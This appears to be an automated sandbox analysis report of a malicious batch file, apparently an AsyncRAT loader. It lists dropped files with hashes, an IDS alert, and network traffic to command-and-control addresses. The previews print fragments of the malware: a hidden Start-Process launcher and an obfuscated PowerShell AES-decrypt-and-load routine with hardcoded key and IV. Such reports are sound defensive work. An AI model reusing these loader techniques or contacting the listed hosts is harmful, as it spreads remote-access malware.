                                        SSDEEP:384:yMsfMMhcS2SxSvoxSlS9SDMUYyMBYdMdYfMdYZMJBMgBMBMWtMcQMyMZMsfMCKaB:+2okpI/o
                                        MD5:3B39E393CEEE32E50D363547A0AB23CC
                                        SHA1:792D8BD151A583C2C7E8D587799404613070A050
                                        SHA-256:2B26398F8F13D86A157F9611A961A88D63A439D132F8F8315201F6944CB07107
                                        SHA-512:1F5C67373209B603A1CBFC6A0394853203A68013934B21382B85C8A21052C1B82C68FC42D943E876F6E7B5031B33A5E0E67BAE45AA09ED3950C247352A7BEC70
                                        Malicious:false
                                        Preview:ElfChnk.z"......."......z"......."...........5...8.....a.....................................................................Q.7................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...........}%..................................u...................................................**.......".........a...........Z7;&.......................................................................F.....!...A.A..............a......r.r.wJ..`..3oX........."...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e..7*...\..C.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......u...............I.......I.n.v.o.k.i.n.g. .l.i.c.e.n.s.e. .m.a.n.a.g.e.r. .b.e.c.a.u.s.e. .l.i.c.e.n.s.e./.l.e.a.s.e. .p.o.l.l.i.n.g. .t.i.m.e. .u.p.:. .P.F.N. .M.i.c.r
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.2305573051374772
                                        Encrypted:false
                                        SSDEEP:384:phL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmfPUmD+UmxUmBUmxUm:pY7LM
                                        MD5:38DDC0D6E2F296743CF4A3E22830F8ED
                                        SHA1:FAA40792E1A6F8AD8CD1EC6EC61E9C0232C20D11
                                        SHA-256:886F12875E0B1F98D5A61C42D96B95F0F8C992DC0F77E428B0CED2CC030913D2
                                        SHA-512:41C548C0D81C02855C71ACCDDCD8B75232459A5C405B94FAA7743495B142F9D1B7F10A7D2F47DB8845E1A5B4987D71BD4728A62B02CE14C248804460C2D32369
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.20419738899088638
                                        Encrypted:false
                                        SSDEEP:48:MzkWTvrP+wTQNRBEZWTENO4bPBFor/6a:yBUNVaO87or/6a
                                        MD5:4290A73D555ED1B522EF91BD46D98040
                                        SHA1:B95BDB305D22FB0E50FBB231ECC965A7F0E85CA6
                                        SHA-256:72D891E6A157629B876199DBA8BF28D4B76ECBC98515FF9991CE8105E4338A06
                                        SHA-512:2C1FB9E8EE13409215F5972F4CD810E90132BD5F9A7A69713333BAB29D3024782C5E3427480533FD86F85B97110AA50792F4DB3552C72EC2E3859EE4E2DCABCA
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.081454356890361
                                        Encrypted:false
                                        SSDEEP:384:OhMiv9i6ri+Hi7EibniWihKixiTijKiFi5iuiUioifiN8ixiEixihiliYi9niO8t:OfNa/xQM9QSp
                                        MD5:F38DD63F1596D1039571A5D80A147980
                                        SHA1:278553D5556ACBAF4E671C41F9A930CA0D253F11
                                        SHA-256:5AC3EDCEBF4CC25A645D62044E94FD695452E12A72D3500D98898E3F766C4875
                                        SHA-512:F6CE9DDF2D6888FB2DBB4C17544E632D8D5057B3C96577F70AD6F3B8EEA84274BFE092D94A0F3D2965DAD553209652AB5A28778C88DF9FDB5A8FA3E7D1EC8FFC
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.3971599419737166
                                        Encrypted:false
                                        SSDEEP:768:6IaonjahaJaFaBaNaZaxa5aVaRaxaRataxaJapaBaZa9aRa5a9a9aRalaxa9alaf:Rn
                                        MD5:567AA8D6C32E58E57348123A512B9F13
                                        SHA1:34B5A43DB4C6A1AD1956E62EF5F74AA7025976B8
                                        SHA-256:3A7340312BA2C74D23F4944FC12C83344586F34255ECF4912281BE7F863C09D7
                                        SHA-512:8ACCBA51812F6807E135A20C9B825E2AC0C94A65AAA54F4C033554105F2723333F9DB6DC120880B036F9E25401C4DE1AE359F5928DE8F7608D23B5C0807A30B0
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.4147866220767469
                                        Encrypted:false
                                        SSDEEP:384:XhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJ3XJpyXJGXJQXJyXJbXJHXJZ:XQ0yUkNYwD8imLEJpmaYm9ZZ
                                        MD5:5AC69472258A06CCE6D64B90D882DD98
                                        SHA1:FE3AFF211337BBEDDF9E188F419495EDEED10F2D
                                        SHA-256:4E1ABC12F4354A38FB1B34228498C106713E751D06F206EFE76B1013DE3B09BD
                                        SHA-512:EC964437F5B9D0D3AB7CD4EB59C9B1215D22C244099C5F3EEFCB18F4B1F0EDC47FD38D3D83F0306136699C498BBBE3FE9C4489E976A7573DFE3E7427A5123A1E
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.335502462229597
                                        Encrypted:false
                                        SSDEEP:384:rhjmrmvm3BmOmbmLmomtmImj5pmHm5mxEmtPmoGmNlmmmCmZmLJmAkm2rmqimtmU:rGX5XDcxXaPv
                                        MD5:55C2C83DABDC93F6135C1875602E337D
                                        SHA1:3E825BFC09D43C9310193ED95D28BCC2C3E157CA
                                        SHA-256:587414170FCD20D1ED1BE71F5FB4D39CD2AA9169F694B51997866F7F20023E18
                                        SHA-512:3660BE713BF840ACF9D2B3E3C621D08B27B0A24E836A787351B777E6052E75BF1FE275C2A543A31C338E03B121D067C206E8D5C64320DB4C917D2E6EC443199F
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.343747536559921
                                        Encrypted:false
                                        SSDEEP:384:Yho27s2m2C2i2g2Q2l2Q2A2g2jl2l2E2k28242A2g2U202Q2G2e2O2n2r2X272XF:Yf0mbm
                                        MD5:90EA562392E0A34BDD8BF8CED995478A
                                        SHA1:A8DB3CEB353E018652470C5D146FBB99755644E8
                                        SHA-256:1394D5A46782AED86CB80F8C9C66D05852229CD03138AD825D855AF3365DECFC
                                        SHA-512:6A9F396A0FA4B52589CE8557BCCCDB77DA5236E2FF47A697F3833FCEA2A1AAE7E75AF1E0E05E8E92F5BB0E26D906C51810C2AB0726C16F1D5C85278C3FC57DE4
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 10, DIRTY
                                        Category:dropped
                                        Size (bytes):75072
                                        Entropy (8bit):1.77832356166662
                                        Encrypted:false
                                        SSDEEP:1536:McpP9JcY6+g4+Ga6ncpP9JcY6+g4+Ga6:McpP9JcY6+g4+Ga6ncpP9JcY6+g4+Ga6
                                        MD5:B94D54D00E865EB4977DD01981413ACE
                                        SHA1:F7DB3750700527B7308985DAD7783B6AF2DFA59D
                                        SHA-256:A922CD0D14D7B2D8E927EA2DC1902CF569673ACCC78DA73152AD9390E3A1C78C
                                        SHA-512:B29E5E44117ED163DDE2BF5ACECA83B46362323F58E3A53A79AC1EE99C9832231DB7DBAD55DC4CE59A5FFDBB1059C946014C0E2A22E36AB50B9BE460417D7720
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.778019944796982
                                        Encrypted:false
                                        SSDEEP:384:/Kh8R+uRqRERNRiRcRTRRR8RiRDRhRuNRBRCR8R0RCtRgRQRNRTRrRMRhqlRRK/2:CZ
                                        MD5:4376CAD4CDECE3A64C0E734FAED490F6
                                        SHA1:4142FE53D5E342E6A1B5CD09ADEDDCADDFB5476E
                                        SHA-256:3F90108C906E7CE5F0D50C64935DC166FC4A98BB72D029ECBD6398C17DCD96A2
                                        SHA-512:A0DBEC67DCA2CCC37882A47302D59691AAC5FE96D68833790108E747CD83228573C17CA823DAABF33634944B03A534CC821E3F3837147814FFC4838FE032F30E
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.248562733326363
                                        Encrypted:false
                                        SSDEEP:384:ThThquhVh3hfhMhohghrhwhAhS5hqhShmh0hohRhNIh1BwhohGh5h3hShChWhzhM:T80FFpkBQL1
                                        MD5:3B202E0452EBFB9892AEB5D31B114EF9
                                        SHA1:EB516634D8C4E4BC3A1BFF0529DE8084B8C97415
                                        SHA-256:02D362B03A9A229E86546E073260C9F77BBF79142552E0EBE994A4B5EDF1729F
                                        SHA-512:D1B13B90844FFF51F84A84E517DF3B990ED12E13AA375B32A94333059DFAC4D72A309ED3EC830A348AA0011C2FEEEEAD5D4C9CFF6C17A2A7FBDD0B0F8CFC4D0A
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.3101945749546235
                                        Encrypted:false
                                        SSDEEP:384:GhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVAViVhcVSVsVX6:GyjbP
                                        MD5:FFD7548AA8B73513E37AC74F7FC499B7
                                        SHA1:7BAF52151B91BDFA56D12285A88E0AF2BBDA1AD0
                                        SHA-256:418A17FEDA3FCB510EBA4F33A7D7ADDF1DC4FF23E09460BA2E41D92E01393F31
                                        SHA-512:A4BDC043871F8BFC002912A12FB7453CB0EB451F6D35DCE88726B45805F69E0C08999AA83F569826E30520B17935F372D283E94261D0B284850FE8A07618E3D0
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.303784953285182
                                        Encrypted:false
                                        SSDEEP:384:UhxBwBuBwBOXBwByXyBwB6BwBLBwB6BwB6BwBEBwB01BwBfw/D7BwBL/iBwBfCbU:UvuCbCHDMgBWuh
                                        MD5:C2A65A94493082684E64DB6E56C72D0F
                                        SHA1:0AF5B9ABB145130AED2C257628ACF41D159444B8
                                        SHA-256:2E7E891CF8FB13F7A2D4B446268AB6D3C79A1624198483503142E6744FBA5F73
                                        SHA-512:074848A696EFE337064BFDAECEB148EBF3F9AE7AED32C2C8F7BD84B721E7D164EB9329FE613BF6985BCF5A2336089078970E78C119B09A571F1D007F76FE8FDE
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.415502860476199
                                        Encrypted:false
                                        SSDEEP:384:/hNUEuUEdeUEFUEWUEbUEGUE7eUEt9UE8oUEbPUETaUEEpUESEUED7UEhmUEGlUi:/2qgYE
                                        MD5:7750FCF3463E4684F5956C8EF6545615
                                        SHA1:673F0508FDFE69CBABABDFDC29133640FA81051E
                                        SHA-256:FA412F1DA2F16D58A180E41D4793F4AF3512803C93E3DDA457305473F1CBF2FF
                                        SHA-512:6AE0FE662EEFD4ED26D6C40F742706AF38F3D448A92C23DE2986F11D3C7890DA6B5235C716085EA07E048548C429A4E91FE5F2DD422D1B03CCF0EC403E2156FC
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):69864
                                        Entropy (8bit):4.331852611016058
                                        Encrypted:false
                                        SSDEEP:768:AGeu3t54aP9IJyS8TWGeu3t5Mjy167tbiikqokbE8noJp2g5d5zq:/lC
                                        MD5:70113D102FC5345FC8EE4CB6A3279A96
                                        SHA1:FD88172CD5A40D9ED5415E8E08635785B0A8B2F3
                                        SHA-256:EA1D758DAE4C58330699FF69C57C2B6330EF7208965DA92278C513CDB1009C9B
                                        SHA-512:0A07EA3104A31BC43D247070F0329E3EDB56C5610EDEBF6EB20236A038BC6810447631CEA65A8C02734FF81E5A6EF40684A9BB07033840472B7805EF4DC74EB6
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.730236132667886
                                        Encrypted:false
                                        SSDEEP:384:CFR1b1BbJuZbgQVl7VrFWXrE5krYnm5DDhw7ww55JkK6FEGSgLawBD3gKCJcGmyg:kXid/x5kd253pW5Yp5aC+6/lXZuuluO
                                        MD5:8209E6F994DD7BFCDF531E4E8C7C662D
                                        SHA1:78F133C6CA51608D2EFCE9E00B60EA2A1EBE1A9B
                                        SHA-256:BF3F81A0542761AC59B96390D2BA412C86525C8BB68F36CA6FB4BF467E4E3D37
                                        SHA-512:DA919CC293E67038C74799878CA536CB8A7B7EF4222579F259E1459A8B981FA2CFB61BB7BE1778A90EAF4A1D52A0F81D458B72EDBDE7B6F8F8C2976D2907308D
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):205656
                                        Entropy (8bit):3.767194516212821
                                        Encrypted:false
                                        SSDEEP:6144:h3OiW3OiB3Oin3Oi73Oie3OiW3OiB3Oin3Oi73OiO3OiW3OiB3Oin3Oi73Oip:Q
                                        MD5:0FFF3D6BAB92BB4BD06E4886D0CAF1FE
                                        SHA1:2A2AC1CB9B8F0F441BB02C7F8B9944633B7E7C1A
                                        SHA-256:CDF5CB95A013DC766F8D20DDBD2DEAC8240CB8D4B0116FFF743ECB1315E6AB03
                                        SHA-512:45E71A84EDA1A66BAF417D71D3468EB292F1701D16101DC80DD50BE071BB01D7915477332752D0822236581F42A3BE98107818F06509BD521ECBA34664366D36
                                        Malicious:false
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:MS Windows registry file, NT/2000 or above
                                        Category:dropped
                                        Size (bytes):1835008
                                        Entropy (8bit):4.469606957218248
                                        Encrypted:false
                                        SSDEEP:6144:SzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNwjDH5S:0ZHtYZWOKnMM6bFp+j4
                                        MD5:5C3F749BBD3B6A0C85E548749041CEB9
                                        SHA1:6CD11C385D7D7FED885D26FC4669EE03EA6A06A2
                                        SHA-256:57FB8FD589ABB2F1522AE7BAD0A410DB6E290F2DA6917F0022D34262F65CA010
                                        SHA-512:5D2D71739E1B0FA3D3806E860569C270C5C82F642B5B09A3B8FDE7B4B30DF9171B4166CD0A1AD1C9AEDB6C77DF740D6C05F0678CECD20A2597B6ED56A01B8FB8
                                        Malicious:false
                                        Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..LM..................................................................................................................................................................................................................................................................................................................................................Zy........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):85
                                        Entropy (8bit):4.84935141926561
                                        Encrypted:false
                                        SSDEEP:3:jKMFIwpVh+d3LKMP9IdXMfyM9oM3Ky:jKMFIsV8d7Koq01R3Ky
                                        MD5:D8C4F9FD5B972AE487170EA993933179
                                        SHA1:32E61F1DD8A462CEDC6B7A636275363B011ABDA9
                                        SHA-256:728A155A3A8272BB230C121C67CC90A986C11B84504E3902AC4EEDA9D8EC78ED
                                        SHA-512:1F4E7C0C8DC83C0280E77290CF76738D0611FBB9ADBC4D76A7DF4FD2E1EE49F684400E16008ED58D89009D4FE67C456094E9610279B4A20DDAC39038A3F5D4DF
                                        Malicious:false
                                        Preview:Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden ..
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (2695), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2842
                                        Entropy (8bit):5.268015847851952
                                        Encrypted:false
                                        SSDEEP:48:9JFHDRBXRG8R4YRxyKB3k4B3KX9zS3FXBvY595f8bLb8MS91ccCwMqu1whc9pWiM:PFHDRtVt7vBpB6a5xY595f8bus3wMVd2
                                        MD5:9CC1C2B55FAB8BD000AAD5A08F2019F8
                                        SHA1:5F440F6A9D6E88A8CF27C6806F8889667B09E9A6
                                        SHA-256:F22B3303843BB1C6793AD334D24DBD6CB7B9531836A2F9B4ACBB6262A3BCC885
                                        SHA-512:975BB4E81F089B545F45C49D94D0C78156B14A8FA10C8965B8FCEB335D3BF09569548B0B4F41F0DAF98C1209EF50C0C096D0EAE7F1689461D434C4ABFFC55A8A
                                        Malicious:false
                                        Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function Rgueq($eXEDy){.$HKJEc=[System.Security.Cryptography.Aes]::Create();.$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ=');.$HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA==');.$HipTi=$HKJEc.CreateDecryptor();.$ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length);.$HipTi.Dispose();.$HKJEc.Dispose();.$ioqgE;}function qVeuI($eXEDy){.Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', '');.Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblckt
                                        File type:ASCII text, with very long lines (5674), with CRLF line terminators
                                        Entropy (8bit):6.008704485108026
                                        TrID:
                                          File name:rbx-CO2.bat
                                          File size:5'214'429 bytes
                                          MD5:d1324a085a54c035d136f7a73edec440
                                          SHA1:3049e422f937395d1d64e205ce5978182d3c2388
                                          SHA256:6a25d0ca74a29596a0c09f26acbe9f85a46d5c1c886a6860dc915d94ffbbbe5a
                                          SHA512:0d43b7711a86a6c04dda27555037dc5e459a5aad4fe719e0d03b2d37cf3b8274e9a0417d089135e9abc3d6232f2bf7264781b5a8b7988058c13bc0c794027cbc
                                          SSDEEP:49152:BYFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:r
                                          TLSH:4436120B1D54ECBECDA50DAEE95A2F0FF432BE57F02909B6611B05BD07781E104D9A3A
                                          File Content Preview:Aecho off..%^%A%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJq
                                          Icon Hash:9686878b929a9886
                                           Timestamp                        SID      Signature                                   Severity  Source IP       Source Port  Dest IP      Dest Port  Protocol
                                           2024-10-03T14:54:46.061887+0200  2035595  ET MALWARE Generic AsyncRAT Style SSL Cert  1         154.216.20.132  6969         192.168.2.6  59172      TCP
                                           Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                           Oct 3, 2024 14:54:44.376554966 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:44.383065939 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:44.383156061 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:44.393441916 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:44.420083046 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:46.061584949 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:46.061608076 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:46.061666012 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:46.061887026 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:46.061929941 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:46.062189102 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:46.062223911 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:46.062804937 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:46.063071966 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:46.064805031 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:46.069664001 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:46.272224903 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:46.324009895 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:46.433005095 CEST  59173        443        192.168.2.6      147.135.36.89
                                           Oct 3, 2024 14:54:46.433047056 CEST  443          59173      147.135.36.89    192.168.2.6
                                           Oct 3, 2024 14:54:46.433177948 CEST  59173        443        192.168.2.6      147.135.36.89
                                           Oct 3, 2024 14:54:46.436111927 CEST  59173        443        192.168.2.6      147.135.36.89
                                           Oct 3, 2024 14:54:46.436134100 CEST  443          59173      147.135.36.89    192.168.2.6
                                           Oct 3, 2024 14:54:47.334980965 CEST  443          59173      147.135.36.89    192.168.2.6
                                           Oct 3, 2024 14:54:47.335107088 CEST  59173        443        192.168.2.6      147.135.36.89
                                           Oct 3, 2024 14:54:47.338654041 CEST  59173        443        192.168.2.6      147.135.36.89
                                           Oct 3, 2024 14:54:47.338671923 CEST  443          59173      147.135.36.89    192.168.2.6
                                           Oct 3, 2024 14:54:47.339190960 CEST  443          59173      147.135.36.89    192.168.2.6
                                           Oct 3, 2024 14:54:47.343328953 CEST  59173        443        192.168.2.6      147.135.36.89
                                           Oct 3, 2024 14:54:47.387414932 CEST  443          59173      147.135.36.89    192.168.2.6
                                           Oct 3, 2024 14:54:47.578969955 CEST  443          59173      147.135.36.89    192.168.2.6
                                           Oct 3, 2024 14:54:47.579144955 CEST  443          59173      147.135.36.89    192.168.2.6
                                           Oct 3, 2024 14:54:47.579325914 CEST  59173        443        192.168.2.6      147.135.36.89
                                           Oct 3, 2024 14:54:47.647700071 CEST  59173        443        192.168.2.6      147.135.36.89
                                           Oct 3, 2024 14:54:47.817766905 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:47.838105917 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:47.838260889 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:47.853101015 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:48.213129997 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:48.261557102 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:48.399955988 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:48.449027061 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:53.086011887 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:53.136550903 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:53.234055996 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:53.238888025 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:53.244369030 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:53.245670080 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:53.250598907 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.182183981 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.230294943 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:54.412175894 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.413000107 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.413050890 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:54.527923107 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:54.528033018 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:54.532829046 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.533072948 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.533077955 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.533082962 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.533118963 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.533123970 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.533149004 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:54.533149004 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:54.533212900 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:54.533396006 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.533401012 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.533416033 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.533468008 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:54.533502102 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.535115004 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:54.537648916 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.537817955 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:54.538026094 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.538029909 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.538039923 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.538044930 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.538117886 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.538146019 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:54.538248062 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.538264036 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.538340092 CEST  59172        6969       192.168.2.6      154.216.20.132
                                           Oct 3, 2024 14:54:54.538496017 CEST  6969         59172      154.216.20.132   192.168.2.6
                                           Oct 3, 2024 14:54:54.538501024 CEST  6969         59172      154.216.20.132   192.168.2.6
